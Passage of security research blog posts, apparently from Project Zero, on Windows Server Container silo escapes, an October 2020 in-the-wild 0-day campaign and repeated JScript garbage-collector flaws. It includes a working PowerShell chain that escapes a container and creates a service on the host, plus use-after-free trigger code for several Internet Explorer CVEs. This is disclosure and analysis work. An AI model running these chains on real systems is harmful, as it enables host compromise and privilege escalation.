The fact that I had two bugs in less than a day was somewhat concerning, however at least that knowledge can be applied to any mitigation strategy. I thought I should dig a bit deeper into the kernel to see what else I could exploit from a normal user.

A Little Bit of Reverse Engineering

While basic inspection had been surprisingly fruitful, it was likely that I’d need some reverse engineering to shake out anything else. I know from previous experience with Desktop Bridge how the registry overlays and object manager redirection work when combined with silos. Desktop Bridge uses application silos rather than server silos, but the two take similar approaches.

The kernel’s main mechanism for enforcing container isolation is to call a function that checks whether the process is in a silo and then behave differently based on the result. I decided to try and track down where the silo state was checked and see if I could find any misuse. You’d think the kernel would only have a few functions which would return the current silo state. Unfortunately you’d be wrong. The following is a short list of the functions I checked:

IoGetSilo, IoGetSiloParameters, MmIsSessionInCurrentServerSilo, OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO, ObGetSiloRootDirectoryPath, ObpGetSilosRootDirectory, PsGetCurrentServerSilo, PsGetCurrentServerSiloGlobals, PsGetCurrentServerSiloName, PsGetCurrentSilo, PsGetEffectiveServerSilo, PsGetHostSilo, PsGetJobServerSilo, PsGetJobSilo, PsGetParentSilo, PsGetPermanentSiloContext, PsGetProcessServerSilo, PsGetProcessSilo, PsGetServerSiloActiveConsoleId, PsGetServerSiloGlobals, PsGetServerSiloServiceSessionId, PsGetServerSiloState, PsGetSiloBySessionId, PsGetSiloContainerId, PsGetSiloContext, PsGetSiloIdentifier, PsGetSiloMonitorContextSlot, PsGetThreadServerSilo, PsIsCurrentThreadInServerSilo, PsIsHostSilo, PsIsProcessInAppSilo, PsIsProcessInSilo, PsIsServerSilo, PsIsThreadInSilo

Of course that’s not a comprehensive list of functions, but those are the ones that looked the most likely to either return the silo and its properties or check if something was in a silo. Checking the references to these functions wasn’t going to be comprehensive, for various reasons:

  1. We’re only checking for bad checks, not the lack of a check.
  2. The kernel has the structure type definition for the Job object which contains the silo, so the call could easily be inlined.
  3. We’re only checking the kernel, many of these functions are exported for driver use so could be called by other kernel components that we’re not looking at.

The first issue I found was due to a call to PsIsCurrentThreadInServerSilo. I noticed a reference to the function inside CmpOKToFollowLink which is a function that’s responsible for enforcing symlink checks in the registry. At a basic level, registry symbolic links are not allowed to traverse from an untrusted hive to a trusted hive.

For example if you put a symbolic link in the current user’s hive which redirects to the local machine hive the CmpOKToFollowLink will return FALSE when opening the key and the operation will fail. This prevents a user planting symbolic links in their hive and finding a privileged application which will write to that location to elevate privileges.

BOOLEAN CmpOKToFollowLink(PCMHIVE SourceHive, PCMHIVE TargetHive) {

  if (PsIsCurrentThreadInServerSilo() 

    || !TargetHive

    || TargetHive == SourceHive) {

    return TRUE;

  }

  if (SourceHive->Flags.Trusted)

    return FALSE;

  // Check trust list.

}

Looking at CmpOKToFollowLink we can see where PsIsCurrentThreadInServerSilo is being used. If the current thread is in a server silo then all links are allowed between any hives. The check for the trusted state of the source hive only happens after this initial check so is bypassed. I’d speculate that during development the registry overlays couldn’t be marked as trusted so a symbolic link in an overlay would not be followed to a trusted hive it was overlaying, causing problems. Someone presumably added this bypass to get things working, but no one realized they needed to remove it when support for trusted overlays was added.
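
To make the effect of the early return concrete, here is a toy JavaScript model of the check. It is only a sketch: the function name, the hive objects and the `trusted` field are illustrative assumptions, and the trust rule is the simplified one stated in the text (an untrusted hive must not redirect into a trusted one) rather than the kernel's real trust list.

```javascript
// Toy model of the registry symlink trust check. All names and fields are
// illustrative assumptions, not the real kernel structures.
function okToFollowLink(sourceHive, targetHive, inServerSilo, siloBypass = true) {
  // The pre-fix bypass: a thread in a server silo may follow any link.
  if (siloBypass && inServerSilo) return true;
  // No target hive, or a link within the same hive, is always allowed.
  if (!targetHive || targetHive === sourceHive) return true;
  // Simplified trust rule from the text: an untrusted hive must not
  // redirect into a trusted one. (The real code consults a trust list.)
  if (!sourceHive.trusted && targetHive.trusted) return false;
  return true;
}

const userHive = { name: "current user", trusted: false };
const machineHive = { name: "local machine", trusted: true };

console.log(okToFollowLink(userHive, machineHive, false));       // false: blocked on the host
console.log(okToFollowLink(userHive, machineHive, true));        // true: allowed inside a server silo
console.log(okToFollowLink(userHive, machineHive, true, false)); // false: blocked once the bypass is removed
```

The third call models the behavior after the silo check is removed: the container no longer gets special treatment and the normal trust rule applies.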

To exploit this in a container I needed to find a privileged kernel component which would write to a registry key that I could control. I found a good primitive inside Win32k for supporting FlickInfo configuration (which seems to be related in some way to touch input, but it’s not documented). When setting the configuration Win32k would create a known key in the current user’s hive. I could then redirect the key creation to the local machine hive allowing creation of arbitrary keys in a privileged location. I don’t believe this primitive could be directly combined with the registry silo escape issue but I didn’t investigate too deeply. At a minimum this would allow a non-administrator user to elevate privileges inside a container, where you could then use registry silo escape to write to the host registry.

The second issue was due to a call to OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO. This function would get the root object manager namespace directory for a silo.

POBJECT_DIRECTORY OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(PEJOB Silo) {

  if (Silo) {

    PPSP_STORAGE Storage = Silo->Storage;

    PPSP_SLOT Slot = Storage->Slot[PsObjectDirectorySiloContextSlot];

    if (Slot->Present)

      return Slot->Value;

  }

  return ObpRootDirectoryObject;

}

We can see that the function extracts a storage parameter from the passed-in silo and, if the slot is present, returns its value. If the silo is NULL or the slot isn’t present then the global root directory stored in ObpRootDirectoryObject is returned. When the server silo is set up the slot is populated with a new root directory, so this function should always return the silo root directory rather than the real global root directory.

This code seems perfectly fine, if the server silo is passed in it should always return the silo root object directory. The real question is, what silo do the callers of this function actually pass in? We can check that easily enough, there are only two callers and they both have the following code.

PEJOB silo = PsGetCurrentSilo();

Root = OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(silo);

Okay, so the silo is coming from PsGetCurrentSilo. What does that do?

PEJOB PsGetCurrentSilo() {

  PETHREAD Thread = PsGetCurrentThread();

  PEJOB silo = Thread->Silo;

  if (silo == (PEJOB)-3) {

    silo = Thread->Tcb.Process->Job;

    while(silo) {

      if (silo->JobFlags & EJOB_SILO) {

        break;

      }

      silo = silo->ParentJob;

    }

  }

  return silo;

}

A silo can be associated with a thread through impersonation, or it can be one of the jobs in the hierarchy of jobs associated with a process. This function first checks if the thread is in a silo. If not, signified by the -3 placeholder, it searches the process’s job hierarchy for any job which has the EJOB_SILO flag set. If a silo is found it’s returned from the function, otherwise NULL is returned.

This is a problem, as it’s not explicitly checking for a server silo. I mentioned earlier that there are two types of silo, application and server. While creating a new server silo requires administrator privileges, creating an application silo requires no privileges at all. Therefore to trick the object manager into using the global root directory all we need to do is:

  1. Create an application silo.
  2. Assign it to a process.
  3. Fully access the root of the object manager namespace.

This is basically a more powerful version of the global symlink vulnerability but requires no administrator privileges to function. Again, as with the registry issue you’re still limited in what you can modify outside of the containers based on the token in the container. But you can read files on disk, or interact with ALPC ports on the host system.
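
The lookup described above can be sketched as a toy JavaScript model. This is a hedged illustration, not kernel code: the object shapes (`isSilo`, `rootDirectory`, `parentJob`) and the function names are assumptions that mirror the decompiled logic shown earlier.

```javascript
// Toy model of the silo lookup. Field and function names are illustrative
// assumptions that mirror the decompiled pseudocode, not real kernel types.
const NO_THREAD_SILO = -3;            // placeholder meaning "no thread silo set"
const hostRoot = { name: "host root" };

function getCurrentSilo(thread) {
  let silo = thread.silo;
  if (silo === NO_THREAD_SILO) {
    // Walk up the job hierarchy and stop at the first silo of ANY type.
    silo = thread.process.job;
    while (silo) {
      if (silo.isSilo) break;
      silo = silo.parentJob;
    }
  }
  return silo;
}

function getSiloRootDirectory(silo) {
  // Falls back to the host root when the silo has no root directory slot.
  if (silo && silo.rootDirectory) return silo.rootDirectory;
  return hostRoot;
}

// A containerized process: its job is the server silo, which has its own root.
const serverSilo = { isSilo: true, rootDirectory: { name: "silo root" }, parentJob: null };
const proc = { job: serverSilo };
const thread = { silo: NO_THREAD_SILO, process: proc };
const before = getSiloRootDirectory(getCurrentSilo(thread)).name;

// Nest an application silo (no root directory) under the server silo.
const appSilo = { isSilo: true, rootDirectory: null, parentJob: serverSilo };
proc.job = appSilo;
const after = getSiloRootDirectory(getCurrentSilo(thread)).name;

console.log(before, "->", after); // silo root -> host root
```

The walk stops at the application silo because it only asks "is this a silo?", so the server silo's root directory slot is never consulted.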

The exploit in PowerShell is pretty straightforward using my toolchain:

PS> $root = Get-NtDirectory "\"

PS> $root.FullPath

\

PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory

PS> Set-NtProcessJob $silo -Current

PS> $root.FullPath

\Silos\748

To test the exploit we first open the current root directory object and then print its full path as the kernel sees it. Even though the silo root isn’t really a root directory the kernel makes it look like it is by returning a single backslash as the path.

We then create the application silo using the New-NtJob command. You need to specify NoSiloRootDirectory to prevent the code trying to create a root directory which we don’t want and can’t be done from a non-administrator account anyway. We can then assign the application silo to the process.

Now we can check the root directory path again. We now find the root directory is really called \Silos\748 instead of just a single backslash. This is because the kernel is now using the real root directory. At this point you can access resources on the host through the object manager.

Chaining the Exploits

We can now combine these issues together to escape the container completely from ContainerUser. First get hold of an administrator token through something like RogueWinRM; you can then impersonate it due to having SeImpersonatePrivilege. Then you can use the object manager root directory issue to access the host’s service control manager (SCM) using the ALPC port to create a new service. You don’t even need to copy an executable outside the container, as the system volume for the container is a device on the host that we can access directly.

As far as the host’s SCM is concerned you’re an administrator and so it’ll grant you full access to create an arbitrary service. However, when that service starts it’ll run in the host, not in the container, removing all restrictions. One quirk which can make exploitation unreliable is that the SCM’s RPC handle can be cached by the Win32 APIs. If any connection is made to the SCM in any part of PowerShell before installing the service you will end up accessing the container’s SCM, not the host’s.

To get around this issue we can just access the RPC service directly using NtObjectManager’s RPC commands.

PS> $imp = $token.Impersonate()

PS> $sym_path = "$env:SystemDrive\symbols"

PS> mkdir $sym_path | Out-Null

PS> $services_path = "$env:SystemRoot\system32\services.exe"

PS> $cmd = 'cmd /C echo "Hello World" > \hello.txt'

# You can also use the following to run a container based executable.

#$cmd = Use-NtObject($f = Get-NtFile -Win32Path "demo.exe") {

#   "\\.\GLOBALROOT" + $f.FullPath

#}

PS> Get-Win32ModuleSymbolFile -Path $services_path -OutPath $sym_path

PS> $rpc = Get-RpcServer $services_path -SymbolPath $sym_path | 

   Select-RpcServer -InterfaceId '367abb81-9844-35f1-ad32-98f038001003'

PS> $client = Get-RpcClient $rpc

PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory

PS> Set-NtProcessJob $silo -Current

PS> Connect-RpcClient $client -EndpointPath ntsvcs

PS> $scm = $client.ROpenSCManagerW([NullString]::Value, `

 [NullString]::Value, `

 [NtApiDotNet.Win32.ServiceControlManagerAccessRights]::CreateService)

PS> $service = $client.RCreateServiceW($scm.p3, "GreatEscape", "", `

 [NtApiDotNet.Win32.ServiceAccessRights]::Start, 0x10, 0x3, 0, $cmd, `

 [NullString]::Value, $null, $null, 0, [NullString]::Value, $null, 0)

PS> $client.RStartServiceW($service.p15, 0, $null)

For this code to work it’s expected you have an administrator token in the $token variable to impersonate. Getting that token is left as an exercise for the reader. When you run it in a container the result should be the file hello.txt written to the root of the host’s system drive.

Getting the Issues Fixed

I have some server silo escapes, now what? I would prefer to get them fixed, however as already mentioned MSRC servicing criteria pointed out that Windows Server Containers are not a supported security boundary.

I decided to report the registry symbolic link issue immediately, as I could argue that was something which would allow privilege escalation inside a container from a non-administrator. This would fit within the scope of a normal bug I’d find in Windows, it just required a special environment to function. This was issue 2120 which was fixed in February 2021 as CVE-2021-24096. The fix was pretty straightforward, the call to PsIsCurrentThreadInServerSilo was removed as it was presumably redundant.

The issue with ContainerUser having SeImpersonatePrivilege could be by design. I couldn’t find any official Microsoft or Docker documentation describing the behavior so I was wary of reporting it. That would be like reporting that a normal service account has the privilege, which is by design. So I held off on reporting this issue until I had a better understanding of the security expectations.

The situation with the other two silo escapes was more complicated as they explicitly crossed an undefended boundary. There was little point reporting them to Microsoft if they wouldn’t be fixed. There would be more value in publicly releasing the information so that any users of the containers could try and find mitigating controls, or stop using Windows Server Container for anything where untrusted code could ever run.

After much back and forth with various people in MSRC a decision was made. If a container escape works from a non-administrator user, basically if you can access resources outside of the container, then it would be considered a privilege escalation and therefore serviceable. This means that Daniel’s global symbolic link bug which kicked this all off still wouldn’t be eligible as it required SeTcbPrivilege which only administrators should be able to get. It might be fixed at some later point, but not as part of a bulletin.

I reported the three other issues (the ContainerUser issue was also considered to be in scope) as 2127, 2128 and 2129. These were all fixed in March 2021 as CVE-2021-26891, CVE-2021-26865 and CVE-2021-26864 respectively.

Microsoft has not changed the MSRC servicing criteria at the time of writing. However, they will consider fixing any issue which on the surface seems to escape a Windows Server Container but doesn’t require administrator privileges. It will be classed as an elevation of privilege.

Conclusions

The decision by Microsoft to not support Windows Server Containers as a security boundary looks to be a valid one, as there’s just so much attack surface here. While I managed to get four issues fixed I doubt that they’re the only ones which could be discovered and exploited. Ideally you should never run untrusted workloads in a Windows Server Container, but then they probably shouldn’t provide remotely accessible services either. The only realistic use case for them is for internally visible services with little to no interactions with the rest of the world. The official guidance for GKE is to not use Windows Server Containers in hostile multi-tenancy scenarios. This is covered in the GKE documentation here.

Obviously, the recommended approach is to use Hyper-V isolation. That moves the needle and Hyper-V is at least a supported security boundary. However container escapes are still useful as getting full access to the hosting VM could be quite important in any successful escape. Not everyone can run Hyper-V though, which is why GKE isn't currently using it.

In-the-Wild Series: October 2020 0-day discovery

Posted by Maddie Stone, Project Zero

In October 2020, Google Project Zero discovered seven 0-day exploits being actively used in-the-wild. These exploits were delivered via "watering hole" attacks in a handful of websites pointing to two exploit servers that hosted exploit chains for Android, Windows, and iOS devices. These attacks appear to be the next iteration of the campaign discovered in February 2020 and documented in this blog post series.

In this post we are summarizing the exploit chains we discovered in October 2020. We have already published the details of the seven 0-day vulnerabilities exploited in our root cause analysis (RCA) posts. This post aims to provide the context around these exploits.

What happened

In October 2020, we discovered that the actor from the February 2020 campaign came back with the next iteration of their campaign: a couple dozen websites redirecting to an exploit server. Once our analysis began, we discovered links to a second exploit server on the same website. After initial fingerprinting (appearing to be based on the origin of the IP address and the user-agent), an iframe was injected into the website pointing to one of the two exploit servers. 

In our testing, both of the exploit servers existed on all of the discovered domains. A summary of the two exploit servers is below:

Exploit server #1:

  • Initially responded to only iOS and Windows user-agents
  • Remained up and active for over a week from when we first started pulling exploits
  • Replaced the Chrome renderer RCE with a new v8 0-day (CVE-2020-16009) after the initial one (CVE-2020-15999) was patched
  • Briefly responded to Android user-agents after exploit server #2 went down (though we were only able to get the new Chrome renderer RCE)

Exploit server #2:

  • Responded to Android user-agents
  • Remained up and active for ~36 hours from when we first started pulling exploits
  • In our experience, responded to a much smaller block of IP addresses than exploit server #1

The diagram above shows the flow of a device connecting to one of the affected websites. The device is directed to either exploit server #1 or exploit server #2. The following exploits are then delivered based on the device and browser.

Exploit Server | Platform | Browser | Renderer RCE | Sandbox Escape | Local Privilege Escalation
-------------- | -------- | ------- | ------------ | -------------- | --------------------------
1 | iOS | Safari | Stack R/W via Type 1 Fonts (CVE-2020-27930) | Not needed | Info leak via mach message trailers (CVE-2020-27950); Type confusion with turnstiles (CVE-2020-27932)
1 | Windows | Chrome | Freetype heap buffer overflow (CVE-2020-15999) | Not needed | cng.sys heap buffer overflow (CVE-2020-17087)
1 | Android** | Chrome | V8 type confusion in TurboFan (CVE-2020-16009) | Unknown | Unknown
2 | Android | Chrome | Freetype heap buffer overflow (CVE-2020-15999) | Chrome for Android heap buffer overflow (CVE-2020-16010) | Unknown
2 | Android | Samsung Browser | Freetype heap buffer overflow (CVE-2020-15999) | Chromium n-day | Unknown

** Note: This was only delivered after #2 went down and CVE-2020-15999 was patched.

All of the platforms employed obfuscation and anti-analysis checks, but each platform's obfuscation was different. For example, iOS is the only platform whose exploits were encrypted with ephemeral keys, meaning that the exploits couldn't be recovered from the packet dump alone, instead requiring an active MITM on our side to rewrite the exploit on-the-fly.

These operational exploits also lead us to believe that while the entities behind exploit servers #1 and #2 are different, they are likely working in a coordinated fashion. Both exploit servers used the Chrome Freetype RCE (CVE-2020-15999) as the renderer exploit for Windows (exploit server #1) and Android (exploit server #2), but the code that surrounded these exploits was quite different. The fact that the two servers went down at different times also leads us to believe that there were two distinct operators.

The exploits

In total, we collected:

  • 1 full chain targeting fully patched Windows 10 using Google Chrome
  • 2 partial chains targeting 2 different fully patched Android devices running Android 10 using Google Chrome and Samsung Browser, and
  • RCE exploits for iOS 11-13 and privilege escalation exploit for iOS 13 (though the vulnerabilities were present up to iOS 14.1)

*Note: iOS, Android, and Windows were the only devices we tested while the servers were still active. The lack of other exploit chains does not mean that those chains did not exist.

The seven 0-days exploited by this attacker are listed below. We’ve provided the technical details of each of the vulnerabilities and their exploits in the root cause analyses.

We were not able to collect any Android local privilege escalations prior to exploit server #2 being taken down. Exploit server #1 stayed up longer, and we were able to retrieve the privilege escalation exploits for iOS.

The vulnerabilities cover a fairly broad spectrum of issues - from a modern JIT vulnerability to a large cache of font bugs. Overall each of the exploits themselves showed an expert understanding of exploit development and the vulnerability being exploited. In the case of the Chrome Freetype 0-day, the exploitation method was novel to Project Zero. The process to figure out how to trigger the iOS kernel privilege vulnerability would have been non-trivial. The obfuscation methods were varied and time-consuming to figure out.

Conclusion

Project Zero closed out 2020 with lots of long days analyzing lots of 0-day exploit chains and seven 0-day exploits. When combined with their earlier 2020 operation, the actor used at least 11 0-days in less than a year. We are so thankful to all of the vendors and defensive response teams who worked their own long days to analyze our reports and get patches released and applied.

Déjà vu-lnerability

A Year in Review of 0-days Exploited In-The-Wild in 2020

Posted by Maddie Stone, Project Zero

2020 was a year full of 0-day exploits. Many of the Internet’s most popular browsers had their moment in the spotlight. Memory corruption is still the name of the game and how the vast majority of detected 0-days are getting in. While we tried new methods of 0-day detection with modest success, 2020 showed us that there is still a long way to go in detecting these 0-day exploits in-the-wild. But what may be the most notable fact is that 25% of the 0-days detected in 2020 are closely related to previously publicly disclosed vulnerabilities. In other words, 1 out of every 4 detected 0-day exploits could potentially have been avoided if a more thorough investigation and patching effort were explored. Across the industry, incomplete patches — patches that don’t correctly and comprehensively fix the root cause of a vulnerability — allow attackers to use 0-days against users with less effort.

Since mid-2019, Project Zero has dedicated an effort specifically to track, analyze, and learn from 0-days that are actively exploited in-the-wild. For the last 6 years, Project Zero’s mission has been to “make 0-day hard”. From that came the goal of our in-the-wild program: “Learn from 0-days exploited in-the-wild in order to make 0-day hard.” In order to ensure our work is actually making it harder to exploit 0-days, we need to understand how 0-days are actually being used. Continuously pushing forward the public’s understanding of 0-day exploitation is only helpful when it doesn’t diverge from the “private state-of-the-art”, what attackers are doing and are capable of.

Over the last 18 months, we’ve learned a lot about the active exploitation of 0-days and our work has matured and evolved with it. For the 2nd year in a row, we’re publishing a “Year in Review” report of the previous year’s detected 0-day exploits. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you’re interested in each individual exploit’s analysis, please check out our root cause analyses.

When looking at the 24 0-days detected in-the-wild in 2020, there’s an undeniable conclusion: increasing investment in correct and comprehensive patches is a huge opportunity for our industry to impact attackers using 0-days. 

A correct patch is one that fixes a bug with complete accuracy, meaning the patch no longer allows any exploitation of the vulnerability. A comprehensive patch applies that fix everywhere that it needs to be applied, covering all of the variants. We consider a patch to be complete only when it is both correct and comprehensive. When exploiting a single vulnerability or bug, there are often multiple ways to trigger the vulnerability, or multiple paths to access it. Many times we’re seeing vendors block only the path that is shown in the proof-of-concept or exploit sample, rather than fixing the vulnerability as a whole, which would block all of the paths. Similarly, security researchers are often reporting bugs without following up on how the patch works and exploring related attacks.
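
The difference between blocking one path and fixing the root cause can be illustrated with a small, entirely hypothetical JavaScript sketch. The parser, its two entry points (`pathA`, `pathB`) and the option names are invented for illustration and do not correspond to any of the vulnerabilities discussed here.

```javascript
// Hypothetical example: one shared routine with a missing bounds check,
// reachable through two entry points. Names are invented for illustration.
function makeParser({ checkInPathA, checkInRoot }) {
  function readItems(buffer, count) {
    // Root-cause fix: validate in the shared routine itself.
    if (checkInRoot && count > buffer.length) throw new RangeError("count out of range");
    // Without a check, reads past the end yield undefined (our "overread").
    return Array.from({ length: count }, (_, i) => buffer[i]);
  }
  return {
    pathA(buffer, count) {
      // Incomplete fix: validate only on the path used by the proof-of-concept.
      if (checkInPathA && count > buffer.length) throw new RangeError("count out of range");
      return readItems(buffer, count);
    },
    pathB(buffer, count) {
      return readItems(buffer, count);
    },
  };
}

// Returns true if the entry point still reads past the end of the buffer.
function overreads(entryPoint) {
  try {
    return entryPoint([1, 2], 4).includes(undefined);
  } catch (e) {
    return false; // the request was rejected
  }
}

const incomplete = makeParser({ checkInPathA: true, checkInRoot: false });
const complete = makeParser({ checkInPathA: false, checkInRoot: true });

console.log(overreads(incomplete.pathA), overreads(incomplete.pathB)); // false true
console.log(overreads(complete.pathA), overreads(complete.pathB));     // false false
```

With the incomplete fix the original proof-of-concept stops working, yet the second path reaches the same bug unchanged, which is the pattern the variants in this report follow.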

While the idea that incomplete patches are making it easier for attackers to exploit 0-days may be uncomfortable, the converse of this conclusion can give us hope. We have a clear path toward making 0-days harder. If more vulnerabilities are patched correctly and comprehensively, it will be harder for attackers to exploit 0-days.

This vulnerability looks familiar 🤔

As stated in the introduction, 2020 included 0-day exploits that are similar to ones we’ve seen before. 6 of the 24 0-day exploits detected in-the-wild are closely related to publicly disclosed vulnerabilities. Some of these 0-day exploits only had to change a line or two of code to have a new working 0-day exploit. This section explains how each of these 6 actively exploited 0-days is related to a previously seen vulnerability. We’re taking the time to detail each and show the minimal differences between the vulnerabilities to demonstrate that once you understand one of the vulnerabilities, it’s much easier to then exploit another.

Product | Vulnerability exploited in-the-wild | Variant of...
------- | ----------------------------------- | -------------
Microsoft Internet Explorer | CVE-2020-0674 | CVE-2018-8653*, CVE-2019-1367*, CVE-2019-1429*
Mozilla Firefox | CVE-2020-6820 | Mozilla Bug 1507180
Google Chrome | CVE-2020-6572 | CVE-2019-5870, CVE-2019-13695
Microsoft Windows | CVE-2020-0986 | CVE-2019-0880*
Google Chrome/Freetype | CVE-2020-15999 | CVE-2014-9665
Apple Safari | CVE-2020-27930 | CVE-2015-0093

* vulnerability was also exploited in-the-wild in previous years

Internet Explorer JScript CVE-2020-0674

CVE-2020-0674 is the fourth vulnerability that’s been exploited in this bug class in 2 years. The other three vulnerabilities are CVE-2018-8653, CVE-2019-1367, and CVE-2019-1429. In the 2019 year-in-review we devoted a section to these vulnerabilities. Google’s Threat Analysis Group attributed all four exploits to the same threat actor. It bears repeating, the same actor exploited similar vulnerabilities four separate times. For all four exploits, the attacker used the same vulnerability type and the same exact exploitation method. Fixing these vulnerabilities comprehensively the first time would have caused attackers to work harder or find new 0-days.

JScript is the legacy JavaScript engine in Internet Explorer. While it’s legacy, by default it is still enabled in Internet Explorer 11, which is a built-in feature of Windows 10 computers. The bug class, or type of vulnerability, is that a specific JScript object, a variable (uses the VAR struct), is not tracked by the garbage collector. I’ve included the code to trigger each of the four vulnerabilities below to demonstrate how similar they are. Ivan Fratric from Project Zero wrote all of the included code that triggers the four vulnerabilities.
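
As a rough mental model of this bug class, the following toy mark-and-sweep collector shows what happens when a live reference is missing from the collector's root set. It is a sketch in modern JavaScript with invented names (`ToyHeap`, `roots`, `freed`) and says nothing about how JScript's collector is actually implemented.

```javascript
// Toy mark-and-sweep collector. An illustrative model only; it does not
// reflect the real JScript garbage collector.
class ToyHeap {
  constructor() {
    this.blocks = new Set(); // every live allocation
    this.roots = new Set();  // references the collector knows about
  }
  alloc(name) {
    const block = { name, freed: false, refs: [] };
    this.blocks.add(block);
    return block;
  }
  collect() {
    // Mark: everything reachable from the known roots survives.
    const marked = new Set();
    const stack = [...this.roots];
    while (stack.length > 0) {
      const block = stack.pop();
      if (marked.has(block)) continue;
      marked.add(block);
      stack.push(...block.refs);
    }
    // Sweep: everything else is freed, even if code still holds a reference.
    for (const block of this.blocks) {
      if (!marked.has(block)) {
        block.freed = true;
        this.blocks.delete(block);
      }
    }
  }
}

const heap = new ToyHeap();
const tracked = heap.alloc("tracked");
const untracked = heap.alloc("untracked");
heap.roots.add(tracked);
// `untracked` is still held by a local variable (like arguments[0] or a named
// argument in the triggers below), but the collector has no root for it.
heap.collect();

console.log(tracked.freed, untracked.freed); // false true
```

Any later use of `untracked` corresponds to the final `alert(...)` in each trigger: the script still has a reference, but the memory behind it has already been reclaimed.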

CVE-2018-8653

In December 2018, it was discovered that CVE-2018-8653 was being actively exploited. In this vulnerability, the this variable is not tracked by the garbage collector in the isPrototypeOf callback. McAfee also wrote a write-up going through each step of this exploit.

var objs = new Array();

var refs = new Array();

var dummyObj = new Object();

function getFreeRef()

{

  // 5. delete prototype objects as well as ordinary objects

  for ( var i = 0; i < 10000; i++ ) {

    objs[i] = 1;

  }

  CollectGarbage();

  for ( var i = 0; i < 200; i++ )

  {

    refs[i].prototype = 1;

  }

  // 6. Garbage collector frees unused variable blocks.

  // This includes the one holding the "this" variable

  CollectGarbage();

  // 7. Boom

  alert(this);

}

// 1. create "special" objects for which isPrototypeOf can be invoked

for ( var i = 0; i < 200; i++ ) {

        var arr = new Array({ prototype: {} });

        var e = new Enumerator(arr);

        refs[i] = e.item();

}

// 2. create a bunch of ordinary objects

for ( var i = 0; i < 10000; i++ ) {

        objs[i] = new Object();

}

// 3. create objects to serve as prototypes and set up callbacks

for ( var i = 0; i < 200; i++ ) {

        refs[i].prototype = {};

        refs[i].prototype.isPrototypeOf = getFreeRef;

}

// 4. calls isPrototypeOf. This sets up refs[100].prototype as "this" variable

// During callback, the "this" variable won't be tracked by the Garbage collector

// use different index if this doesn't work

dummyObj instanceof refs[100];

CVE-2019-1367

In September 2019, CVE-2019-1367 was detected as exploited in-the-wild. This is the same vulnerability type as CVE-2018-8653: a JScript variable object is not tracked by the garbage collector. This time though the variables that are not tracked are in the arguments array in the Array.sort callback.

var spray = new Array();

function F() {

    // 2. Create a bunch of objects

    for (var i = 0; i < 20000; i++) spray[i] = new Object();

    // 3. Store a reference to one of them in the arguments array

    //    The arguments array isn't tracked by garbage collector

    arguments[0] = spray[5000];

    // 4. Delete the objects and call the garbage collector

    //    All JScript variables get reclaimed...

    for (var i = 0; i < 20000; i++) spray[i] = 1;

    CollectGarbage();

    // 5. But we still have reference to one of them in the

    //    arguments array

    alert(arguments[0]);

}

// 1. Call sort with a custom callback

[1,2].sort(F);

CVE-2019-1429

The CVE-2019-1367 patch did not actually fix the vulnerability triggered by the proof-of-concept above and exploited in-the-wild. The proof-of-concept for CVE-2019-1367 still worked even after the CVE-2019-1367 patch was applied!

In November 2019, Microsoft released another patch to address this gap. CVE-2019-1429 addressed the shortcomings of the CVE-2019-1367 patch and also fixed a variant. In the variant, the variables in the arguments array are not tracked by the garbage collector in the toJSON callback rather than the Array.sort callback. The only difference between the variant triggers is the lines marked with + and - below. Instead of calling the Array.sort callback, we call the toJSON callback.

var spray = new Array();

function F() {

    // 2. Create a bunch of objects

    for (var i = 0; i < 20000; i++) spray[i] = new Object();

    // 3. Store a reference to one of them in the arguments array

    //    The arguments array isn't tracked by garbage collector

    arguments[0] = spray[5000];

    // 4. Delete the objects and call the garbage collector

    //    All JScript variables get reclaimed...

    for (var i = 0; i < 20000; i++) spray[i] = 1;

    CollectGarbage();

    // 5. But we still have reference to one of them in the

    //    arguments array

    alert(arguments[0]);

}

+  // 1. Cause toJSON callback to fire

+  var o = {toJSON:F}

+  JSON.stringify(o);

-  // 1. Call sort with a custom callback

-  [1,2].sort(F);

CVE-2020-0674

In January 2020, CVE-2020-0674 was detected as exploited in-the-wild. The vulnerability is that the named arguments are not tracked by the garbage collector in the Array.sort callback. The only change required to the trigger for CVE-2019-1367 is to replace the references to arguments[] with one of the arguments named in the function definition. For example, we replaced any instances of arguments[0] with arg1.

var spray = new Array();

+  function F(arg1, arg2) {

-  function F() {

    // 2. Create a bunch of objects

    for (var i = 0; i < 20000; i++) spray[i] = new Object();

    // 3. Store a reference to one of them in one of the named arguments

    //    The named arguments aren't tracked by garbage collector

+    arg1 = spray[5000];

-    arguments[0] = spray[5000];

    // 4. Delete the objects and call the garbage collector

    //    All JScript variables get reclaimed...

    for (var i = 0; i < 20000; i++) spray[i] = 1;

    CollectGarbage();

    // 5. But we still have reference to one of them in

    //   a named argument

+    alert(arg1);

-    alert(arguments[0]);

}

// 1. Call sort with a custom callback

[1,2].sort(F);

CVE-2020-0968

Unfortunately CVE-2020-0674 was not the end of this story, even though it was the fourth vulnerability of this type to be exploited in-the-wild. In April 2020, Microsoft patched CVE-2020-0968, another Internet Explorer JScript vulnerability. When the bulletin was first released, it was designated as exploited in-the-wild, but the following day, Microsoft changed this field to say it was not exploited in-the-wild (see the revisions section at the bottom of the advisory).

var spray = new Array();

function f1() {

  alert('callback 1');

  return spray[6000];

}

function f2() {

  alert('callback 2');

  spray = null;

  CollectGarbage();

  return 'a'

}

function boom() {

  var e = o1;

  var d = o2;

  // 3. the first callback (e.toString) happens

  //    it returns one of the string variables

  //    which is stored in a temporary variable

  //    on the stack, not tracked by garbage collector

  // 4. Second callback (d.toString) happens

  //    There, string variables get freed

  //    and the space reclaimed

  // 5. Crash happens when attempting to access

  //    string content of the temporary variable

  var b = e + d;

  alert(b);

}

// 1. create two objects with toString callbacks

var o1 = { toString: f1 };

var o2 = { toString: f2 };

// 2. create a bunch of string variables

for (var a = 0; a < 20000; a++) {

  spray[a] = "aaa";

}

boom();

In addition to the vulnerabilities themselves being very similar, the attacker used the same exploit method for each of the four 0-day exploits. This provided a type of “plug and play” quality to their 0-day development which would have reduced the amount of work required for each new 0-day exploit.

Firefox CVE-2020-6820

Mozilla patched CVE-2020-6820 in Firefox with an out-of-band security update in April 2020. It is a use-after-free in the Cache subsystem.

